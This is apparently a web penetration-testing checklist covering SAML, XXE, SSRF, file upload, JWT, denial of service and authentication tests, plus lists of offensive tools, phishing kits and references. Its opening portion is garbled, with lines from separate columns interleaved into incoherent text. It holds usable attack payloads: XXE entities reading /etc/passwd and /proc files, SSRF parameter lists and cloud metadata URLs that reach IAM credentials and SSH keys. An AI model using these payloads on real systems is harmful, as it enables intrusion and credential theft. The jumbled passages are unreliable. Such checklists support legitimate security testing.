It To UUID Of Victim Attacker e.g. Email Of

Internal Employee Or Admin Account etc https://github.com/OWASP/wstg/tree/


master/document/4-Web_Application_
- [ ] Try To Figure Out If The Server Security_Testing/07-Input_Validation_
Vulnerable To XML Signature Wrapping Testing
OR Not?
Identify variables that are reflected in
- [ ] Try To Figure Out If The Server responses.
Checks The Identity Of The Signer OR Not?
Testing for Reflected Cross Site Scripting Assess the input they accept and the
- [ ] Try To Inject XXE Payloads At The encoding that gets applied on return (if
Top Of The SAML Response any).

- [ ] Try To Inject XSLT Payloads Into Identify stored input that is reflected on
The Transforms Element As A Child the client-side.

Node Of The SAML Response


Testing for Stored Cross Site Scripting Assess the input they accept and the
encoding that gets applied on return (if
- [ ] If Victim Can Accept Tokens Issued
any).
By The Same Identity Provider That
Services
Identify SQL injection points.
Attacker, So You Can Takeover Victim
Testing for SQL Injection Assess the severity of the injection and the
Account
level of access that can be achieved
through it.
- [ ] While Testing SSO Try To search In
Burp Suite About URLs In Cookie Header e.
Identify SSI injection points.
g.
Testing for SSI Injection
Host=IP; If There Is Try To Change IP To Assess the severity of the injection.
Your IP To Get SSRF Input Validation Testing
Identify injection points where you can
- **XML Injection Testing** inject code into the application.
Testing for Code Injection
- [ ] Change the content type to text/ Assess the injection severity.
xml then insert below code. Check via
repeater Detect template injection vulnerability
points.

Testing for Server-side Template Injection Identify the templating engine.


```markup
Build the exploit.
<?xml version="1.0" encoding="ISO 8859
1"?> Identify SSRF injection points.

<!DOCTYPE tushar [ Testing for Server-Side Request Forgery Test if the injection points are exploitable.

<!ELEMENT tushar ANY Asses the severity of the vulnerability.

<!ENTITY xxe SYSTEM "file:///etc/ Identify and assess the command injection
passwd" >]><tushar>&xxe;</ Testing for Command Injection points.

<!ENTITY xxe SYSTEM "file:///etc/ Identify existing error output.


hosts" >]><tushar>&xxe;</ Testing for Improper Error Handling
Analyze the different output returned.
<!ENTITY xxe SYSTEM "file:///proc/self/
cmdline" >]><tushar>&xxe;</

<!ENTITY xxe SYSTEM "file:///proc/ network diagrams and configurations;


version" >]><tushar>&xxe;</
archived posts and emails by
``` administrators or other key staff;

logon procedures and username formats;


Use a search engine to search for
- [ ] Blind XXE with out-of-band potentially sensitive information. This may usernames, passwords, and private keys;
interaction Search Engine Recon include:
third-party, or cloud service configuration
- **Cross-origin resource sharing (CORS)** files;

- [ ] Errors parsing Origin headers revealing error message content; and

- [ ] Whitelisted null origin value


development, test, User Acceptance
Testing (UAT), and staging versions of
- **Server-side request forgery (SSRF)**
sites.
- Common injection parameters
Techniques used for web server
fingerprinting include banner grabbing,
eliciting responses to malformed requests,
and using automated tools to perform
```markup
more robust scans that use a combination
of tactics. The fundamental premise by
"access=",
which all these techniques operate is the
same. They all strive to elicit some
"admin=",
response from the web server which can
then be compared to a database of known
"dbg=",
responses and behaviors, and thus
Fingerprint web matched to a known server type.
"debug=",
Identify hidden or obfuscated paths and
"edit=",
functionality through the analysis of
metadata files.
"grant=",
Web Server Metafile Extract and map other information that
"test=",
could lead to better understanding of the
systems at hand.
"alter=",

Enumerate the applications within scope


"clone=",
that exist on a web server.
Enumerate Applications on Webserver
"create=",

Review webpage comments, metadata,


"delete=",
and redirect bodies to find any information
leakage.
"disable=",

"enable=", Gather JavaScript files and review the JS


Review Webpage Content for Information
code to better understand the application
Leakage
"exec=", and to find any information leakage.

"execute=", Identify if source map files or other front-


end debug files exist.
"load=",
Identify possible entry and injection points
"make=", Identify Application Entry Points through request and response analysis.

"modify=", Map the target application and understand


Map Execution Paths Through Application the principal workflows.
"rename=",
Fingerprint the components being used by
"reset=", Fingerprint Web Application Framework the web applications.

"shell=", Understand the architecture of the


Map Application Architecture application and the technologies in use.
"toggle=",
https://github.com/S3cur3Th1sSh1t/
"adm=", Pentest-Tools

"root=", https://github.com/enaqx/awesome-
pentest
"cfg=",
https://github.com/arch3rPro/
"dest=", PentestTools

"redirect=", Information Gathering

"uri=", Domain Name

"path=", Subdomain

"continue=",
Google Hacking
"url=",
GHDB - Google Hack Database
"window=",
SearchDiggity - SearchDiggity 3.1 is the
"next=", primary attack tool of the Google Hacking
Diggity Project
"data=",
Katana - A Python Tool For google Hacking
"reference=",
uDork - uDork is a script written in Bash
"site=", Scripting that uses advanced Google
search techniques to obtain sensitive
"html=", information in files or directories, find IoT
devices, detect versions of web
"val=", applications, and so on.

"validate=", Pagodo - pagodo (Passive Google Dork) -


Automate Google Hacking Database
"domain=",
Information Gathering
scraping and searching .

"callback=", Github

"return=", GitHacker - 🕷 A Git source leak exploit


tool that restores the entire Git repository,
"page=", including data from stash, for white-box
auditing and analysis of developers' mind.
"feed=",
GitGraber - gitGraber is a tool developed
"host=", in Python3 to monitor GitHub to search
and find sensitive data in real time for
"port=", different online services.

"to=",
GitMiner - Tool for advanced mining for
content on Github.
"out=",

Gitrob - Reconnaissance tool for GitHub


"view=",
organizations.
"dir=",
SVN
"show=",
svnExploit - Support for SVN source code
"navigation=", disclosure of full version and Dump it.

"open=", SvnHack - SvnHack is a SVN folder


disclosure exploit.
"file=",
Port Scan
"document=",
Nmap | Zenmap - Free and open source
"folder=", utility for network discovery and security
auditing
"pg=",
Masscan - TCP port scanner, spews SYN
"php_path=", packets asynchronously

"style=", Ports - Common service ports and


exploitations
"doc=",
Goby - Attack surface mapping
"img=",

Goscan - Interactive Network Scanner


"filename="

``` NimScan - 🚀 Fast Port Scanner 🚀

RustScan - 🤖 The Modern Port Scanner


🤖
- [ ] Try basic localhost payloads
OSINT
- Bypassing filters
theHarvester- E-mails, subdomains and
- [ ] Bypass using HTTPS
WSTG (Web names Harvester - OSINT

- [ ] Bypass with [::]


Application Security SpiderFoot - SpiderFoot automates OSINT
for threat intelligence and mapping your
- [ ] Bypass with a domain redirection
Testing) OWASP - attack surface.

- [ ] Bypass using a decimal IP


location Mind Map FOCA - Tool to find metadata and hidden
information in the documents.

- [ ] Bypass using IPv6/IPv4 Address Amass - In-depth Attack Surface Mapping


Embedding and Asset Discovery

- [ ] Bypass using malformed urls


Censys-subdomain-finder - Perform
subdomain enumeration using the
- [ ] Bypass using rare address(short-
certificate transparency logs from Censys.
hand IP addresses by dropping the zeros)

- [ ] Bypass using enclosed alphanumerics

- Cloud Instances

- AWS

```markup
http://instance-data
http://169.254.169.254
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
```

- Google Cloud

```markup
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
```

- Digital Ocean

```markup
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
```

- Azure

```markup
http://169.254.169.254/metadata/v1/maintenance
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
```

- [ ] Bypassing via open redirection

- **File Upload Testing**

- [ ] Upload the malicious file to the archive upload functionality and observe how the application responds

- [ ] Upload a file and change its path to overwrite an existing system file

- [ ] Large File Denial of Service

- [ ] Metadata Leakage

- [ ] ImageMagick Library Attacks

- [ ] Pixel Flood Attack

- Bypasses

- [ ] Null Byte (%00) Bypass

- [ ] Content-Type Bypass

- [ ] Magic Byte Bypass

- [ ] Client-Side Validation Bypass

- [ ] Blacklisted Extension Bypass

- [ ] Homographic Character Bypass

- **CAPTCHA Testing**

- [ ] Missing Captcha Field Integrity Checks

- [ ] HTTP Verb Manipulation

- [ ] Content Type Conversion

- [ ] Reusable Captcha

- [ ] Check if the captcha is retrievable with an absolute path such as [www.tushar.com/internal/captcha/images/24.png](http://www.chintan.com/internal/captcha/images/24.png)

- [ ] Check for server-side validation of the CAPTCHA: remove the captcha block from the GUI using the Firebug addon and submit the request to the server

- [ ] Check if image recognition can be done with an OCR tool

- **JWT Token Testing**

- [ ] Brute-forcing secret keys

- [ ] Signing a new token with the "none" algorithm

- [ ] Changing the signing algorithm of the token (for fuzzing purposes)

- [ ] Signing the asymmetrically-signed token with its symmetric algorithm match (when you have the original public key)

- **Websockets Testing**

- [ ] Intercepting and modifying WebSocket messages

- [ ] Websockets MITM attempts

- [ ] Testing secret header websocket

- [ ] Content stealing in websockets

- [ ] Token authentication testing in websockets

- **GraphQL Vulnerabilities Testing**

- [ ] Inconsistent Authorization Checks

- [ ] Missing Validation of Custom Scalars

- [ ] Failure to Appropriately Rate-limit

- [ ] Introspection Query Enabled/Disabled

- **WordPress Common Vulnerabilities**

- [ ] XSPA in WordPress

- [ ] Bruteforce in wp-login.php

- [ ] Information disclosure of WordPress username

- [ ] Backup file wp-config exposed

- [ ] Log files exposed

- [ ] Denial of Service via load-styles.php

- [ ] Denial of Service via load-scripts.php

- [ ] DDOS using xmlrpc.php

- **Denial of Service**

- [ ] Cookie bomb

- [ ] Pixel flood, using an image with huge pixel dimensions

- [ ] Frame flood, using a GIF with a huge frame

- [ ] ReDoS (Regex DoS)

- [ ] CPDoS (Cache Poisoned Denial of Service)

- **Other Test Cases (All Categories)**

- Check for security headers, at least:

- [ ] X-Frame-Options

- [ ] X-XSS header

- [ ] HSTS header

- [ ] CSP header

- [ ] Referrer Policy

- [ ] Cache Control

- [ ] Public key pins

- Testing for Role authorization

- [ ] Check if a normal user can access the resources of high-privileged users

- [ ] Forced browsing

- [ ] Insecure direct object reference

- [ ] Parameter tampering to switch user account to a high-privileged user

- Blind OS command injection

- [ ] using time delays

- [ ] by redirecting output

- [ ] with out-of-band interaction

- [ ] with out-of-band data exfiltration

- [ ] Command injection on CSV export (Upload/Download)

- [ ] CSV Excel Macro Injection

- [ ] If you find a phpinfo.php file, check for the configuration leakage and try to exploit any network vulnerability.

- [ ] Parameter Pollution in Social Media Sharing Buttons

- Broken Cryptography

- [ ] Cryptography Implementation Flaw

- [ ] Encrypted Information Compromised

- [ ] Weak Ciphers Used for Encryption

- Web Services Testing

- [ ] Test for directory traversal

- [ ] Web services documentation disclosure: enumeration of services, data types, input types, boundaries and limits

- **Tools**

- EmailHarvester - Email addresses harvester

- Finalrecon - The Last Web Recon Tool You'll Need.

- LittleBrother - Information gathering (OSINT) on a person (EU)

- **Phishing**

- gophish - Open-Source Phishing Toolkit

- AdvPhishing - This is an Advanced Phishing Tool! OTP PHISHING

- SocialFish - Educational Phishing Tool & Information Collector

- Zphisher - An automated phishing tool with 30+ templates. This tool is made for educational purposes only! The author will not be responsible for any misuse of this toolkit!

- Nexphisher - Advanced Phishing tool for Linux & Termux

- **Vulnerability Analysis**

- Fuzzing

- Vulnerability Scanner

- Struts-Scan - Struts2 vulnerability detection and utilization tools

- Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items

- W3af - Web application attack and audit framework, the open source web vulnerability scanner

- Openvas - The world's most advanced Open Source vulnerability scanner and manager

- Openvas Docker

- Archery - Open Source Vulnerability Assessment and Management that helps developers and pentesters perform scans and manage vulnerabilities

- Taipan - Web application vulnerability scanner

- Arachni - Web Application Security Scanner Framework

- **Web Applications**

- CMS & Framework Identification

- AngelSword - CMS vulnerability detection framework

- WhatWeb - Next generation web scanner

- Wappalyzer - Cross-platform utility that uncovers the technologies used on websites

- Whatruns - A free browser extension that helps you identify technologies used on any website at the click of a button (Chrome only)

- WhatCMS - CMS Detection and Exploit Kit based on the Whatcms.org API

- CMSeeK - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs

- Online Tools

- Yunsee - Online website to find the CMS footprint

- Bugscaner - A simple online fingerprint identification system that supports recognition of hundreds of CMS source codes

- WhatCMS online - CMS Detection and Exploit Kit website Whatcms.org

- Tscan - An online tool to get the information of a website

- TideFinger - Fingerprinter Tool from TideSec Team

- Web Application Proxies

- Burpsuite - Burpsuite is a graphical tool for testing Web application security

- ZAP - One of the world's most popular free security tools

- Mitmproxy - An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

- Broxy - An HTTP/HTTPS intercept proxy written in Go.

- Web Crawlers & Directory Brute Force

- Dirbrute - Multi-thread WEB directory blasting tool (with dictionaries inside)

- Dirbuster - DirBuster is a multi-threaded Java application designed to brute force directories and file names on web/application servers

- Docker Scanners

- Fuxi-Scanner - Open source network security vulnerability scanner; it comes with multiple functions.

- Xunfeng - The patrol is a rapid emergency response and cruise scanning system for enterprise intranets

- WebMap - Nmap Web Dashboard and Reporting

- **Configuration and Deployment Management Testing**

- Test Network Infrastructure Configuration

- Review the applications' configurations set across the network and validate that they are not vulnerable.

- Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.

- Test Application Platform Configuration

- Ensure that defaults and known files have been removed.

- Validate that no debugging code or extensions are left in the production environments.

- Review the logging mechanisms set in place for the application.

- Test File Extensions Handling for Sensitive Information

- Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.).

- Validate that no system framework bypasses exist on the rules set.

- Review Old Backup and Unreferenced Files for Sensitive Information

- Find and analyse unreferenced files that might contain sensitive information.

- Enumerate Infrastructure and Application Admin Interfaces

- Identify hidden administrator interfaces and functionality.

- Test HTTP Methods

- Enumerate supported HTTP methods.

- Test for access control bypass.

- Test XST vulnerabilities.

- Test HTTP method overriding techniques.

- Test HTTP Strict Transport Security

- Review the HSTS header and its validity.

- Test RIA Cross Domain Policy

- Review and validate the policy files.

- Test File Permission

- Review and identify any rogue file permissions.

- Test for Subdomain Takeover

- Enumerate all possible domains (previous and current).

- Identify forgotten or misconfigured domains.

- Test Cloud Storage

- Assess that the access control configuration for the storage services is properly in place.

- Testing for Content Security Policy

- Review the Content-Security-Policy header or meta element to identify misconfigurations.

- **References**

- Apache

- Apache Security, by Ivan Ristic, O'Reilly, March 2005.

- Apache Security Secrets: Revealed (Again), Mark Cox, November 2003

- Apache Security Secrets: Revealed, ApacheCon 2002, Las Vegas, Mark J Cox, October 2002

- Performance Tuning

- Lotus Domino

- Lotus Security Handbook, William Tworek et al., April 2004, available in the IBM Redbooks collection

- Lotus Domino Security, an X-Force white paper, Internet Security Systems, December 2002

- Hackproofing Lotus Domino Web Server, David Litchfield, October 2001

- Microsoft IIS

- Security Best Practices for IIS 8

- CIS Microsoft IIS Benchmarks

- Securing Your Web Server (Patterns and Practices), Microsoft Corporation, January 2004

- IIS Security and Programming Countermeasures, by Jason Coombs

- From Blueprint to Fortress: A Guide to Securing IIS 5.0, by John Davis, Microsoft Corporation, June 2001

- Secure Internet Information Services 5 Checklist, by Michael Howard, Microsoft Corporation, June 2000

- Red Hat's (formerly Netscape's) iPlanet

- Guide to the Secure Configuration and Administration of iPlanet Web Server, Enterprise Edition 4.1, by James M Hayes, The Network Applications Team of the Systems and Network Attack Center (SNAC), NSA, January 2001

- WebSphere

- IBM WebSphere V5.0 Security, WebSphere Handbook Series, by Peter Kovari et al., IBM, December 2002.

- IBM WebSphere V4.0 Advanced Edition Security, by Peter Kovari et al., IBM, March 2002.

- General

- Logging Cheat Sheet, OWASP

- SP 800-92 Guide to Computer Security Log Management, NIST

- PCI DSS v3.2.1 Requirement 10 and PA-DSS v3.2 Requirement 4, PCI Security Standards Council

- Generic:

- CERT Security Improvement Modules: Securing Public Web Servers

- Cirt: Default Password list

- FuzzDB can be used to brute force browse the admin login path

- Common admin or debugging parameters

- **Client-Side Testing**

- Testing for DOM-Based Cross Site Scripting

- Identify DOM sinks.

- Build payloads that pertain to every sink type.

- Testing for JavaScript Execution

- Identify sinks and possible JavaScript injection points.

- Testing for HTML Injection

- Identify HTML injection points and assess the severity of the injected content.

- Testing for Client-side URL Redirect

- Identify injection points that handle URLs or paths.

- Assess the locations that the system could redirect to.

- Testing for CSS Injection

- Identify CSS injection points.

- Assess the impact of the injection.

- Testing for Clickjacking

- Understand security measures in place.

- Assess how strict the security measures are and if they are bypassable.

- Testing WebSockets

- Identify the usage of WebSockets.

- Assess its implementation by using the same tests on normal HTTP channels.

- Testing Web Messaging

- Assess the security of the message's origin.

- Validate that it's using safe methods and validating its input.

- Testing for Cross Site Script Inclusion

- Locate sensitive data across the system.

- Assess the leakage of sensitive data through various techniques.

- Testing for Client-side Resource Manipulation

- Identify sinks with weak input validation.

- Assess the impact of the resource manipulation.

- **Authentication Testing**

- Testing for Default Credentials

- Determine whether the application has any user accounts with default passwords.

- Review whether new user accounts are created with weak or predictable passwords.

- Testing for Bypassing Authentication Schema

- Ensure that authentication is applied across all services that require it.

- Testing for Vulnerable Remember Password

- Validate that the generated session is managed securely and does not put the user's credentials in danger.

- Testing for Browser Cache Weaknesses

- Review if the application stores sensitive information on the client-side.

- Review if access can occur without authorization.
